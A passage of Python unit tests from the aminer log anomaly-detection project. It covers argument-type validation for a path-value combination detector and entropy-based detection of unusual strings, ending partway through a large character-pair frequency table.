EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=b"True") 
self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=set()) def func(x): """This is a test function""" return x+1 EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=func) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, 
["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], 
learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, 
stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EntropyDetectorTest.py000066400000000000000000002275061500476301700301630ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EntropyDetector import EntropyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EntropyDetectorTest(TestBase): """Unittests for the EntropyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new character sets. 
The charset detector is used to learn an alphabet and detect new characters for different identifiers. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ t = time.time() expected_string = '%s Value entropy anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent string values. Anomalies are detected when character pair distributions deviate. # The following events are generated: # value: aminer # value: logdata-anomaly-miner # value: ait-aecid # value: austrian # value: institute # value: lfmvasacz log_atom1 = LogAtom(b"aminer", ParserMatch(MatchElement("/value", b"aminer", b"aminer", None)), t+1, None) log_atom2 = LogAtom(b"logdata-anomaly-miner", ParserMatch(MatchElement("/value", b"logdata-anomaly-miner", b"logdata-anomaly-miner", None)), t+2, None) log_atom3 = LogAtom(b"ait-aecid", ParserMatch(MatchElement("/value", b"ait-aecid", b"ait-aecid", None)), t+3, None) log_atom4 = LogAtom(b"austrian", ParserMatch(MatchElement("/value", b"austrian", b"austrian", None)), t+4, None) log_atom5 = LogAtom(b"institute", ParserMatch(MatchElement("/value", b"institute", b"institute", None)), t+5, None) log_atom6 = LogAtom(b"lfmvasacz", ParserMatch(MatchElement("/value", b"lfmvasacz", b"lfmvasacz", None)), t+6, None) ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False) total_freq = {} freq = {} # Forward log atoms to detector # First value should generate an anomaly, because no frequencies are known yet # Input: aminer # Expected output: Anomaly ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() 
self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Second value should not generate an anomaly, because it contains substring "miner" which shares charpairs with "aminer" # Input: logdata-anomaly-miner # Expected output: None ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Third value should not generate an anomaly, since it is a normal string # Input: ait-aecid # Expected output: None ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Fourth value should not generate an anomaly, since it is a normal string # Input: austrian # Expected output: None ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Fifth value should not generate an anomaly, since it is a normal string # Input: institute # Expected output: None ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Sixth value should generate an anomaly, since it is a randomly generated string # Input: lfmvasacz # Expected output: Anomaly ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) 
# frequencies should change if skip_repetitions = False ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # prob_thresh 10% ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.1, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), ed.__class__.__name__, 1, "austrian")) self.reset_output_stream() self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() 
self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # prob_thresh 50% ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.5, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 2).strftime(dtf), ed.__class__.__name__, 1, "logdata-anomaly-miner")) self.reset_output_stream() self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(dtf), ed.__class__.__name__, 1, "ait-aecid")) self.reset_output_stream() self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), ed.__class__.__name__, 1, "austrian")) self.reset_output_stream() self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), ed.__class__.__name__, 1, "institute")) self.reset_output_stream() self.add_data(log_atom5.raw_data.decode(), freq, total_freq) 
self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # default_freqs = True ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], default_freqs=True, learn_mode=True, output_logline=False) default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], ["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 
6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], ["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], 
["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], ["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 
236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], 
["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], ["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], ["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 